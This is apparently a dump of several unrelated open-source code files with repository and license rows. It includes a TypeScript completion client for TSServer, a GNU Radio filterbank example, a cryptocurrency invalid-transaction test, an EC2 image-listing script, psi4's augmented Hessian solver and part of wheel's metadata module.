self._thread.daemon = True
self._thread.start()
self._StartServer()
# Used to map sequence id's to their corresponding DeferredResponse
# objects. The reader loop uses this to hand out responses.
self._pending = {}
# Used to prevent threads from concurrently reading and writing to
# the pending response dictionary
self._pending_lock = threading.Lock()
_logger.info( 'Enabling typescript completion' )
def _StartServer( self ):
with self._server_lock:
if self._ServerIsRunning():
return
self._logfile = utils.CreateLogfile( LOGFILE_FORMAT )
tsserver_log = '-file {path} -level {level}'.format( path = self._logfile,
level = _LogLevel() )
# TSServer gets the configuration for the log file through the
# environment variable 'TSS_LOG'. This seems to be undocumented but
# looking at the source code it seems like this is the way:
# https://github.com/Microsoft/TypeScript/blob/8a93b489454fdcbdf544edef05f73a913449be1d/src/server/server.ts#L136
environ = os.environ.copy()
utils.SetEnviron( environ, 'TSS_LOG', tsserver_log )
_logger.info( 'TSServer log file: {0}'.format( self._logfile ) )
# We need to redirect the error stream to the output one on Windows.
self._tsserver_handle = utils.SafePopen( PATH_TO_TSSERVER,
stdin = subprocess.PIPE,
stdout = subprocess.PIPE,
stderr = subprocess.STDOUT,
env = environ )
self._tsserver_is_running.set()
def _ReaderLoop( self ):
"""
Read responses from TSServer and use them to resolve
the DeferredResponse instances.
"""
while True:
self._tsserver_is_running.wait()
try:
message = self._ReadMessage()
except RuntimeError:
_logger.exception( SERVER_NOT_RUNNING_MESSAGE )
self._tsserver_is_running.clear()
continue
# We ignore events for now since we don't have a use for them.
msgtype = message[ 'type' ]
if msgtype == 'event':
eventname = message[ 'event' ]
_logger.info( 'Received {0} event from tsserver'.format( eventname ) )
continue
if msgtype != 'response':
_logger.error( 'Unsupported message type {0}'.format( msgtype ) )
continue
seq = message[ 'request_seq' ]
with self._pending_lock:
if seq in self._pending:
self._pending[ seq ].resolve( message )
del self._pending[ seq ]
def _ReadMessage( self ):
"""Read a response message from TSServer."""
# The headers are pretty similar to HTTP.
# At the time of writing, 'Content-Length' is the only supplied header.
headers = {}
while True:
headerline = self._tsserver_handle.stdout.readline().strip()
if not headerline:
break
key, value = utils.ToUnicode( headerline ).split( ':', 1 )
headers[ key.strip() ] = value.strip()
# The response message is a JSON object which comes back on one line.
# Since this might change in the future, we use the 'Content-Length'
# header.
if 'Content-Length' not in headers:
raise RuntimeError( "Missing 'Content-Length' header" )
contentlength = int( headers[ 'Content-Length' ] )
# TSServer adds a newline at the end of the response message and counts it
# as one character (\n) towards the content length. However, newlines are
# two characters on Windows (\r\n), so we need to take care of that. See
# issue https://github.com/Microsoft/TypeScript/issues/3403
content = self._tsserver_handle.stdout.read( contentlength )
if utils.OnWindows() and content.endswith( b'\r' ):
content += self._tsserver_handle.stdout.read( 1 )
return json.loads( utils.ToUnicode( content ) )
def _BuildRequest( self, command, arguments = None ):
"""Build TSServer request object."""
with self._sequenceid_lock:
seq = next( self._sequenceid )
request = {
'seq': seq,
'type': 'request',
'command': command
}
if arguments:
request[ 'arguments' ] = arguments
return request
def _WriteRequest( self, request ):
"""Write a request to TSServer stdin."""
serialized_request = utils.ToBytes( json.dumps( request ) + '\n' )
with self._write_lock:
try:
self._tsserver_handle.stdin.write( serialized_request )
self._tsserver_handle.stdin.flush()
# IOError is an alias of OSError in Python 3.
except ( AttributeError, IOError ):
_logger.exception( SERVER_NOT_RUNNING_MESSAGE )
raise RuntimeError( SERVER_NOT_RUNNING_MESSAGE )
def _SendCommand( self, command, arguments = None ):
"""
Send a request message to TSServer but don't wait for the response.
This function is to be used when we don't care about the response
to the message that is sent.
"""
request = self._BuildRequest( command, arguments )
self._WriteRequest( request )
def _SendRequest( self, command, arguments = None ):
"""
Send a request message to TSServer and wait
for the response.
"""
request = self._BuildRequest( command, arguments )
deferred = DeferredResponse()
with self._pending_lock:
seq = request[ 'seq' ]
self._pending[ seq ] = deferred
self._WriteRequest( request )
return deferred.result()
def _Reload( self, request_data ):
"""
Syncronize TSServer's view of the file to
the contents of the unsaved buffer.
"""
filename = request_data[ 'filepath' ]
contents = request_data[ 'file_data' ][ filename ][ 'contents' ]
tmpfile = NamedTemporaryFile( delete = False )
tmpfile.write( utils.ToBytes( contents ) )
tmpfile.close()
self._SendRequest( 'reload', {
'file': filename,
'tmpfile': tmpfile.name
} )
utils.RemoveIfExists( tmpfile.name )
def _ServerIsRunning( self ):
with self._server_lock:
return utils.ProcessIsRunning( self._tsserver_handle )
def ServerIsHealthy( self ):
return self._ServerIsRunning()
def SupportedFiletypes( self ):
return [ 'typescript' ]
def ComputeCandidatesInner( self, request_data ):
self._Reload( request_data )
entries = self._SendRequest( 'completions', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'start_codepoint' ]
} )
# A less detailed version of the completion data is returned
# if there are too many entries. This improves responsiveness.
if len( entries ) > MAX_DETAILED_COMPLETIONS:
return [ _ConvertCompletionData(e) for e in entries ]
names = []
namelength = 0
for e in entries:
name = e[ 'name' ]
namelength = max( namelength, len( name ) )
names.append( name )
detailed_entries = self._SendRequest( 'completionEntryDetails', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'start_codepoint' ],
'entryNames': names
} )
return [ _ConvertDetailedCompletionData( e, namelength )
for e in detailed_entries ]
def GetSubcommandsMap( self ):
return {
'RestartServer' : ( lambda self, request_data, args:
self._RestartServer( request_data ) ),
'StopServer' : ( lambda self, request_data, args:
self._StopServer() ),
'GoToDefinition' : ( lambda self, request_data, args:
self._GoToDefinition( request_data ) ),
'GoToReferences' : ( lambda self, request_data, args:
self._GoToReferences( request_data ) ),
'GoToType' : ( lambda self, request_data, args:
self._GoToType( request_data ) ),
'GetType' : ( lambda self, request_data, args:
self._GetType( request_data ) ),
'GetDoc' : ( lambda self, request_data, args:
self._GetDoc( request_data ) ),
'RefactorRename' : ( lambda self, request_data, args:
self._RefactorRename( request_data, args ) ),
}
def OnBufferVisit( self, request_data ):
filename = request_data[ 'filepath' ]
self._SendCommand( 'open', { 'file': filename } )
def OnBufferUnload( self, request_data ):
filename = request_data[ 'filepath' ]
self._SendCommand( 'close', { 'file': filename } )
def OnFileReadyToParse( self, request_data ):
self._Reload( request_data )
def _GoToDefinition( self, request_data ):
self._Reload( request_data )
try:
filespans = self._SendRequest( 'definition', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
span = filespans[ 0 ]
return responses.BuildGoToResponseFromLocation(
_BuildLocation( utils.SplitLines( GetFileContents( request_data,
span[ 'file' ] ) ),
span[ 'file' ],
span[ 'start' ][ 'line' ],
span[ 'start' ][ 'offset' ] ) )
except RuntimeError:
raise RuntimeError( 'Could not find definition' )
def _GoToReferences( self, request_data ):
self._Reload( request_data )
response = self._SendRequest( 'references', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
return [
responses.BuildGoToResponseFromLocation(
_BuildLocation( utils.SplitLines( GetFileContents( request_data,
ref[ 'file' ] ) ),
ref[ 'file' ],
ref[ 'start' ][ 'line' ],
ref[ 'start' ][ 'offset' ] ),
ref[ 'lineText' ] )
for ref in response[ 'refs' ]
]
def _GoToType( self, request_data ):
self._Reload( request_data )
try:
filespans = self._SendRequest( 'typeDefinition', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_num' ]
} )
span = filespans[ 0 ]
return responses.BuildGoToResponse(
filepath = span[ 'file' ],
line_num = span[ 'start' ][ 'line' ],
column_num = span[ 'start' ][ 'offset' ]
)
except RuntimeError:
raise RuntimeError( 'Could not find type definition' )
def _GetType( self, request_data ):
self._Reload( request_data )
info = self._SendRequest( 'quickinfo', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
return responses.BuildDisplayMessageResponse( info[ 'displayString' ] )
def _GetDoc( self, request_data ):
self._Reload( request_data )
info = self._SendRequest( 'quickinfo', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
message = '{0}\n\n{1}'.format( info[ 'displayString' ],
info[ 'documentation' ] )
return responses.BuildDetailedInfoResponse( message )
def _RefactorRename( self, request_data, args ):
if len( args ) != 1:
raise ValueError( 'Please specify a new name to rename it to.\n'
'Usage: RefactorRename <new name>' )
self._Reload( request_data )
response = self._SendRequest( 'rename', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ],
'findInComments': False,
'findInStrings': False,
} )
if not response[ 'info' ][ 'canRename' ]:
raise RuntimeError( 'Value cannot be renamed: {0}'.format(
response[ 'info' ][ 'localizedErrorMessage' ] ) )
# The format of the response is:
#
# body {
# info {
# ...
# triggerSpan: {
# length: original_length
# }
# }
#
# locs [ {
# file: file_path
# locs: [
# start: {
# line: line_num
# offset: offset
# }
# end {
# line: line_num
# offset: offset
# }
# ] }
# ]
# }
#
new_name = args[ 0 ]
location = responses.Location( request_data[ 'line_num' ],
request_data[ 'column_num' ],
request_data[ 'filepath' ] )
chunks = []
for file_replacement in response[ 'locs' ]:
chunks.extend( _BuildFixItChunksForFile( request_data,
new_name,
file_replacement ) )
return responses.BuildFixItResponse( [
responses.FixIt( location, chunks )
] )
def _RestartServer( self, request_data ):
with self._server_lock:
self._StopServer()
self._StartServer()
# This is needed because after we restart the TSServer it would lose all
# the information about the files we were working on. This means that the
# newly started TSServer will know nothing about the buffer we're working
# on after restarting the server. So if we restart the server and right
# after that ask for completion in the buffer, the server will timeout.
# So we notify the server that we're working on the current buffer.
self.OnBufferVisit( request_data )
def _StopServer( self ):
with self._server_lock:
if self._ServerIsRunning():
_logger.info( 'Stopping TSServer with PID {0}'.format(
self._tsserver_handle.pid ) )
self._SendCommand( 'exit' )
try:
utils.WaitUntilProcessIsTerminated( self._tsserver_handle,
timeout = 5 )
_logger.info( 'TSServer stopped' )
except RuntimeError:
_logger.exception( 'Error while stopping TSServer' )
self._CleanUp()
def _CleanUp( self ):
utils.CloseStandardStreams( self._tsserver_handle )
self._tsserver_handle = None
if not self.user_options[ 'server_keep_logfiles' ]:
utils.RemoveIfExists( self._logfile )
self._logfile = None
def Shutdown( self ):
self._StopServer()
def DebugInfo( self, request_data ):
with self._server_lock:
if self._ServerIsRunning():
return ( 'TypeScript completer debug information:\n'
' TSServer running\n'
' TSServer process ID: {0}\n'
' TSServer executable: {1}\n'
' TSServer logfile: {2}'.format( self._tsserver_handle.pid,
PATH_TO_TSSERVER,
self._logfile ) )
if self._logfile:
return ( 'TypeScript completer debug information:\n'
' TSServer no longer running\n'
' TSServer executable: {0}\n'
' TSServer logfile: {1}'.format( PATH_TO_TSSERVER,
self._logfile ) )
return ( 'TypeScript completer debug information:\n'
' TSServer is not running\n'
' TSServer executable: {0}'.format( PATH_TO_TSSERVER ) )
def _LogLevel():
return 'verbose' if _logger.isEnabledFor( logging.DEBUG ) else 'normal'
def _ConvertCompletionData( completion_data ):
return responses.BuildCompletionData(
insertion_text = completion_data[ 'name' ],
menu_text = completion_data[ 'name' ],
kind = completion_data[ 'kind' ],
extra_data = completion_data[ 'kind' ]
)
def _ConvertDetailedCompletionData( completion_data, padding = 0 ):
name = completion_data[ 'name' ]
display_parts = completion_data[ 'displayParts' ]
signature = ''.join( [ p[ 'text' ] for p in display_parts ] )
# needed to strip new lines and indentation from the signature
signature = re.sub( '\s+', ' ', signature )
menu_text = '{0} {1}'.format( name.ljust( padding ), signature )
return responses.BuildCompletionData(
insertion_text = name,
menu_text = menu_text,
kind = completion_data[ 'kind' ]
)
def _BuildFixItChunkForRange( new_name,
file_contents,
file_name,
source_range ):
""" returns list FixItChunk for a tsserver source range """
return responses.FixItChunk(
new_name,
responses.Range(
start = _BuildLocation( file_contents,
file_name,
source_range[ 'start' ][ 'line' ],
source_range[ 'start' ][ 'offset' ] ),
end = _BuildLocation( file_contents,
file_name,
source_range[ 'end' ][ 'line' ],
source_range[ 'end' ][ 'offset' ] ) ) )
def _BuildFixItChunksForFile( request_data, new_name, file_replacement ):
""" returns a list of FixItChunk for each replacement range for the
supplied file"""
# On windows, tsserver annoyingly returns file path as C:/blah/blah,
# whereas all other paths in Python are of the C:\\blah\\blah form. We use
# normpath to have python do the conversion for us.
file_path = os.path.normpath( file_replacement[ 'file' ] )
file_contents = utils.SplitLines( GetFileContents( request_data, file_path ) )
return [ _BuildFixItChunkForRange( new_name, file_contents, file_path, r )
for r in file_replacement[ 'locs' ] ]
def _BuildLocation( file_contents, filename, line, offset ):
return responses.Location(
line = line,
# tsserver returns codepoint offsets, but we need byte offsets, so we must
# convert
column = utils.CodepointOffsetToByteOffset( file_contents[ line - 1 ],
offset ),
filename = filename )
| gpl-3.0 |
gnu-sandhi/sandhi | modules/gr36/gnuradio-core/src/examples/pfb/interpolate.py | 17 | 8253 | #!/usr/bin/env python
#
# Copyright 2009 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, blks2
import sys, time
try:
import scipy
from scipy import fftpack
except ImportError:
print "Error: Program requires scipy (see: www.scipy.org)."
sys.exit(1)
try:
import pylab
from pylab import mlab
except ImportError:
print "Error: Program requires matplotlib (see: matplotlib.sourceforge.net)."
sys.exit(1)
class pfb_top_block(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
self._N = 100000 # number of samples to use
self._fs = 2000 # initial sampling rate
self._interp = 5 # Interpolation rate for PFB interpolator
self._ainterp = 5.5 # Resampling rate for the PFB arbitrary resampler
# Frequencies of the signals we construct
freq1 = 100
freq2 = 200
# Create a set of taps for the PFB interpolator
# This is based on the post-interpolation sample rate
self._taps = gr.firdes.low_pass_2(self._interp, self._interp*self._fs, freq2+50, 50,
attenuation_dB=120, window=gr.firdes.WIN_BLACKMAN_hARRIS)
# Create a set of taps for the PFB arbitrary resampler
# The filter size is the number of filters in the filterbank; 32 will give very low side-lobes,
# and larger numbers will reduce these even farther
# The taps in this filter are based on a sampling rate of the filter size since it acts
# internally as an interpolator.
flt_size = 32
self._taps2 = gr.firdes.low_pass_2(flt_size, flt_size*self._fs, freq2+50, 150,
attenuation_dB=120, window=gr.firdes.WIN_BLACKMAN_hARRIS)
# Calculate the number of taps per channel for our own information
tpc = scipy.ceil(float(len(self._taps)) / float(self._interp))
print "Number of taps: ", len(self._taps)
print "Number of filters: ", self._interp
print "Taps per channel: ", tpc
# Create a couple of signals at different frequencies
self.signal1 = gr.sig_source_c(self._fs, gr.GR_SIN_WAVE, freq1, 0.5)
self.signal2 = gr.sig_source_c(self._fs, gr.GR_SIN_WAVE, freq2, 0.5)
self.signal = gr.add_cc()
self.head = gr.head(gr.sizeof_gr_complex, self._N)
# Construct the PFB interpolator filter
self.pfb = blks2.pfb_interpolator_ccf(self._interp, self._taps)
# Construct the PFB arbitrary resampler filter
self.pfb_ar = blks2.pfb_arb_resampler_ccf(self._ainterp, self._taps2, flt_size)
self.snk_i = gr.vector_sink_c()
#self.pfb_ar.pfb.print_taps()
#self.pfb.pfb.print_taps()
# Connect the blocks
self.connect(self.signal1, self.head, (self.signal,0))
self.connect(self.signal2, (self.signal,1))
self.connect(self.signal, self.pfb)
self.connect(self.signal, self.pfb_ar)
self.connect(self.signal, self.snk_i)
# Create the sink for the interpolated signals
self.snk1 = gr.vector_sink_c()
self.snk2 = gr.vector_sink_c()
self.connect(self.pfb, self.snk1)
self.connect(self.pfb_ar, self.snk2)
def main():
tb = pfb_top_block()
tstart = time.time()
tb.run()
tend = time.time()
print "Run time: %f" % (tend - tstart)
if 1:
fig1 = pylab.figure(1, figsize=(12,10), facecolor="w")
fig2 = pylab.figure(2, figsize=(12,10), facecolor="w")
fig3 = pylab.figure(3, figsize=(12,10), facecolor="w")
Ns = 10000
Ne = 10000
fftlen = 8192
winfunc = scipy.blackman
# Plot input signal
fs = tb._fs
d = tb.snk_i.data()[Ns:Ns+Ne]
sp1_f = fig1.add_subplot(2, 1, 1)
X,freq = mlab.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs,
window = lambda d: d*winfunc(fftlen),
scale_by_freq=True)
X_in = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
f_in = scipy.arange(-fs/2.0, fs/2.0, fs/float(X_in.size))
p1_f = sp1_f.plot(f_in, X_in, "b")
sp1_f.set_xlim([min(f_in), max(f_in)+1])
sp1_f.set_ylim([-200.0, 50.0])
sp1_f.set_title("Input Signal", weight="bold")
sp1_f.set_xlabel("Frequency (Hz)")
sp1_f.set_ylabel("Power (dBW)")
Ts = 1.0/fs
Tmax = len(d)*Ts
t_in = scipy.arange(0, Tmax, Ts)
x_in = scipy.array(d)
sp1_t = fig1.add_subplot(2, 1, 2)
p1_t = sp1_t.plot(t_in, x_in.real, "b-o")
#p1_t = sp1_t.plot(t_in, x_in.imag, "r-o")
sp1_t.set_ylim([-2.5, 2.5])
sp1_t.set_title("Input Signal", weight="bold")
sp1_t.set_xlabel("Time (s)")
sp1_t.set_ylabel("Amplitude")
# Plot output of PFB interpolator
fs_int = tb._fs*tb._interp
sp2_f = fig2.add_subplot(2, 1, 1)
d = tb.snk1.data()[Ns:Ns+(tb._interp*Ne)]
X,freq = mlab.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs,
window = lambda d: d*winfunc(fftlen),
scale_by_freq=True)
X_o = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
f_o = scipy.arange(-fs_int/2.0, fs_int/2.0, fs_int/float(X_o.size))
p2_f = sp2_f.plot(f_o, X_o, "b")
sp2_f.set_xlim([min(f_o), max(f_o)+1])
sp2_f.set_ylim([-200.0, 50.0])
sp2_f.set_title("Output Signal from PFB Interpolator", weight="bold")
sp2_f.set_xlabel("Frequency (Hz)")
sp2_f.set_ylabel("Power (dBW)")
Ts_int = 1.0/fs_int
Tmax = len(d)*Ts_int
t_o = scipy.arange(0, Tmax, Ts_int)
x_o1 = scipy.array(d)
sp2_t = fig2.add_subplot(2, 1, 2)
p2_t = sp2_t.plot(t_o, x_o1.real, "b-o")
#p2_t = sp2_t.plot(t_o, x_o.imag, "r-o")
sp2_t.set_ylim([-2.5, 2.5])
sp2_t.set_title("Output Signal from PFB Interpolator", weight="bold")
sp2_t.set_xlabel("Time (s)")
sp2_t.set_ylabel("Amplitude")
# Plot output of PFB arbitrary resampler
fs_aint = tb._fs * tb._ainterp
sp3_f = fig3.add_subplot(2, 1, 1)
d = tb.snk2.data()[Ns:Ns+(tb._interp*Ne)]
X,freq = mlab.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs,
window = lambda d: d*winfunc(fftlen),
scale_by_freq=True)
X_o = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
f_o = scipy.arange(-fs_aint/2.0, fs_aint/2.0, fs_aint/float(X_o.size))
p3_f = sp3_f.plot(f_o, X_o, "b")
sp3_f.set_xlim([min(f_o), max(f_o)+1])
sp3_f.set_ylim([-200.0, 50.0])
sp3_f.set_title("Output Signal from PFB Arbitrary Resampler", weight="bold")
sp3_f.set_xlabel("Frequency (Hz)")
sp3_f.set_ylabel("Power (dBW)")
Ts_aint = 1.0/fs_aint
Tmax = len(d)*Ts_aint
t_o = scipy.arange(0, Tmax, Ts_aint)
x_o2 = scipy.array(d)
sp3_f = fig3.add_subplot(2, 1, 2)
p3_f = sp3_f.plot(t_o, x_o2.real, "b-o")
p3_f = sp3_f.plot(t_o, x_o1.real, "m-o")
#p3_f = sp3_f.plot(t_o, x_o2.imag, "r-o")
sp3_f.set_ylim([-2.5, 2.5])
sp3_f.set_title("Output Signal from PFB Arbitrary Resampler", weight="bold")
sp3_f.set_xlabel("Time (s)")
sp3_f.set_ylabel("Amplitude")
pylab.show()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
| gpl-3.0 |
MeshCollider/Omnicoin | qa/rpc-tests/invalidtxrequest.py | 8 | 2606 | #!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.comptool import TestManager, TestInstance, RejectResult
from test_framework.mininode import *
from test_framework.blocktools import *
import logging
import copy
import time
'''
In this test we connect to one node over p2p, and test tx requests.
'''
# Use the ComparisonTestFramework with 1 node: only use --testbinary.
class InvalidTxRequestTest(ComparisonTestFramework):
''' Can either run this test as 1 node with expected answers, or two and compare them.
Change the "outcome" variable from each TestInstance object to only do the comparison. '''
def __init__(self):
self.num_nodes = 1
def run_test(self):
test = TestManager(self, self.options.tmpdir)
test.add_all_connections(self.nodes)
self.tip = None
self.block_time = None
NetworkThread().start() # Start up network handling in another thread
test.run()
def get_tests(self):
if self.tip is None:
self.tip = int ("0x" + self.nodes[0].getbestblockhash() + "L", 0)
self.block_time = int(time.time())+1
'''
Create a new block with an anyone-can-spend coinbase
'''
height = 1
block = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block.solve()
# Save the coinbase for later
self.block1 = block
self.tip = block.sha256
height += 1
yield TestInstance([[block, True]])
'''
Now we need that block to mature so we can spend the coinbase.
'''
test = TestInstance(sync_every_block=False)
for i in xrange(100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.solve()
self.tip = block.sha256
self.block_time += 1
test.blocks_and_transactions.append([block, True])
height += 1
yield test
# chr(100) is OP_NOTIF
# Transaction will be rejected with code 16 (REJECT_INVALID)
tx1 = create_transaction(self.block1.vtx[0], 0, chr(100), 50*100000000)
yield TestInstance([[tx1, RejectResult(16, 'mandatory-script-verify-flag-failed')]])
# TODO: test further transactions...
if __name__ == '__main__':
InvalidTxRequestTest().main()
| mit |
AICIDNN/cloudbiolinux | utils/images_and_snapshots.py | 10 | 1387 | import boto
import collections
OWNER = '678711657553' # Brad's owner ID
def images_and_snapshots(owner):
"""Retrieve Biolinux image and snapshot information.
"""
conn = boto.connect_ec2()
images = conn.get_all_images(owners=[owner])
images32 = _sorted_images(images, "CloudBioLinux 32")
images64 = _sorted_images(images, "CloudBioLinux 64")
datalibs = _data_libraries(conn, owner)
print images32
print images64
print datalibs
def _data_libraries(conn, owner):
library_types = collections.defaultdict(list)
snaps = conn.get_all_snapshots(owner=owner)
for snap in snaps:
if snap.description.startswith("CloudBioLinux Data"):
# the type is everything except the start and date
data_type = " ".join(snap.description.split()[2:-1])
library_types[data_type].append(snap)
final = dict()
for name, snaps in library_types.iteritems():
snaps = [(s.description, s) for s in snaps]
snaps.sort(reverse=True)
final[name] = [(s.id, d) for (d, s) in snaps]
return final
def _sorted_images(images, start_name):
"""Retrieve a sorted list of images with most recent first.
"""
images = [(i.name, i) for i in images if i.name.startswith(start_name)]
images.sort(reverse=True)
return [(i.id, name) for (name, i) in images]
images_and_snapshots(OWNER)
| mit |
psi4/psi4 | psi4/driver/procrouting/mcscf/augmented_hessian.py | 7 | 5802 | #
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import os
import numpy as np
from psi4 import core
from psi4.driver import p4util
from psi4.driver.p4util.exceptions import *
def ah_iteration(mcscf_obj, tol=1e-3, max_iter=15, lindep=1e-14, print_micro=True):
"""
Solve the generalized eigenvalue problem:
| 0, g.T | | 1/l | = | 1/l |
| g, H/l | | X | = e | X |
Where g is the gradient, H is the orbital Hessian, X is our orbital update step,
and l is the eigenvalue.
In some ways this is the subspace reduction of the full MCSCF Hessian where the
CC part has been solved exactly. When this occurs the OC and CO elements collapse
to the above and the CC Hessian becomes diagonally dominant.
We can solve this through Davidson iterations where we condition the edges. It's the
Pulay equations all over again, just iterative.
Watch out for lambdas that are zero. Looking for the lambda that is ~1.
"""
# Unpack information
orb_grad = mcscf_obj.gradient()
precon = mcscf_obj.H_approx_diag()
approx_step = mcscf_obj.approx_solve()
orb_grad_ssq = orb_grad.sum_of_squares()
# Gears
min_lambda = 0.3
converged = False
warning_neg = False
warning_mult = False
fullG = np.zeros((max_iter + 2, max_iter + 2))
fullS = np.zeros((max_iter + 2, max_iter + 2))
fullS[np.diag_indices_from(fullS)] = 1
guesses = []
sigma_list = []
guesses.append(approx_step)
sigma_list.append(mcscf_obj.compute_Hk(approx_step))
if print_micro:
core.print_out("\n Eigenvalue Rel dE dX \n")
# Run Davidson look for lambda ~ 1
old_val = 0
for microi in range(1, max_iter + 1):
# Gradient
fullG[0, microi] = guesses[-1].vector_dot(orb_grad)
for i in range(microi):
fullG[i + 1, microi] = guesses[-1].vector_dot(sigma_list[i])
fullS[i + 1, microi] = guesses[-1].vector_dot(guesses[i])
fullG[microi] = fullG[:, microi]
fullS[microi] = fullS[:, microi]
wlast = old_val
# Slice out relevant S and G
S = fullS[:microi + 1, :microi + 1]
G = fullG[:microi + 1, :microi + 1]
# Solve Gv = lSv
v, L = np.linalg.eigh(S)
mask = v > (np.min(np.abs(v)) * 1.e-10)
invL = L[:, mask] * (v[mask]**-0.5)
# Solve in S basis, rotate back
evals, evecs = np.linalg.eigh(np.dot(invL.T, G).dot(invL))
vectors = np.dot(invL, evecs)
# Figure out the right root to follow
if np.sum(np.abs(vectors[0]) > min_lambda) == 0:
raise PsiException("Augmented Hessian: Could not find the correct root!\n"\
"Try starting AH when the MCSCF wavefunction is more converged.")
if np.sum(np.abs(vectors[0]) > min_lambda) > 1 and not warning_mult:
core.print_out(r" Warning! Multiple eigenvectors found to follow. Following closest to \lambda = 1.\n")
warning_mult = True
idx = (np.abs(1 - np.abs(vectors[0]))).argmin()
lam = abs(vectors[0, idx])
subspace_vec = vectors[1:, idx]
# Negative roots should go away?
if idx > 0 and evals[idx] < -5.0e-6 and not warning_neg:
core.print_out(' Warning! AH might follow negative eigenvalues!\n')
warning_neg = True
diff_val = evals[idx] - old_val
old_val = evals[idx]
new_guess = guesses[0].clone()
new_guess.zero()
for num, c in enumerate(subspace_vec / lam):
new_guess.axpy(c, guesses[num])
# Build estimated sigma vector
new_dx = sigma_list[0].clone()
new_dx.zero()
for num, c in enumerate(subspace_vec):
new_dx.axpy(c, sigma_list[num])
# Consider restraints
new_dx.axpy(lam, orb_grad)
new_dx.axpy(old_val * lam, new_guess)
norm_dx = (new_dx.sum_of_squares() / orb_grad_ssq)**0.5
if print_micro:
core.print_out(" AH microiter %2d % 18.12e % 6.4e % 6.4e\n" % (microi, evals[idx],
diff_val / evals[idx], norm_dx))
if abs(old_val - wlast) < tol and norm_dx < (tol**0.5):
converged = True
break
# Apply preconditioner
tmp = precon.clone()
val = tmp.clone()
val.set(evals[idx])
tmp.subtract(val)
new_dx.apply_denominator(tmp)
guesses.append(new_dx)
sigma_list.append(mcscf_obj.compute_Hk(new_dx))
if print_micro and converged:
core.print_out("\n")
# core.print_out(" AH converged! \n\n")
#if not converged:
# core.print_out(" !Warning. Augmented Hessian did not converge.\n")
new_guess.scale(-1.0)
return converged, microi, new_guess
| lgpl-3.0 |
raajitr/django_hangman | env/lib/python2.7/site-packages/wheel/metadata.py | 230 | 11050 | """
Tools for converting old- to new-style metadata.
"""
from collections import namedtuple
from .pkginfo import read_pkg_info
from .util import OrderedDefaultDict
try:
from collections import OrderedDict
except ImportError:
OrderedDict = dict
import re
import os.path
import textwrap
import pkg_resources
import email.parser
import wheel
METADATA_VERSION = "2.0"
PLURAL_FIELDS = { "classifier" : "classifiers",
"provides_dist" : "provides",
"provides_extra" : "extras" }
SKIP_FIELDS = set()
CONTACT_FIELDS = (({"email":"author_email", "name": "author"},
"author"),
({"email":"maintainer_email", "name": "maintainer"},
"maintainer"))
# commonly filled out as "UNKNOWN" by distutils:
UNKNOWN_FIELDS = set(("author", "author_email", "platform", "home_page",
"license"))
# Wheel itself is probably the only program that uses non-extras markers
# in METADATA/PKG-INFO. Support its syntax with the extra at the end only.
EXTRA_RE = re.compile("""^(?P<package>.*?)(;\s*(?P<condition>.*?)(extra == '(?P<extra>.*?)')?)$""")
KEYWORDS_RE = re.compile("[\0-,]+")
MayRequiresKey = namedtuple('MayRequiresKey', ('condition', 'extra'))
def unique(iterable):
"""
Yield unique values in iterable, preserving order.
"""
seen = set()
for value in iterable:
if not value in seen:
seen.add(value)
yield value
def handle_requires(metadata, pkg_info, key):
"""
Place the runtime requirements from pkg_info into metadata.
"""
may_requires = OrderedDefaultDict(list)
for value in sorted(pkg_info.get_all(key)):
extra_match = EXTRA_RE.search(value)
if extra_match:
groupdict = extra_match.groupdict()
condition = groupdict['condition']
extra = groupdict['extra']
package = groupdict['package']
if condition.endswith(' and '):
condition = condition[:-5]
else:
condition, extra = None, None
package = value
key = MayRequiresKey(condition, extra)
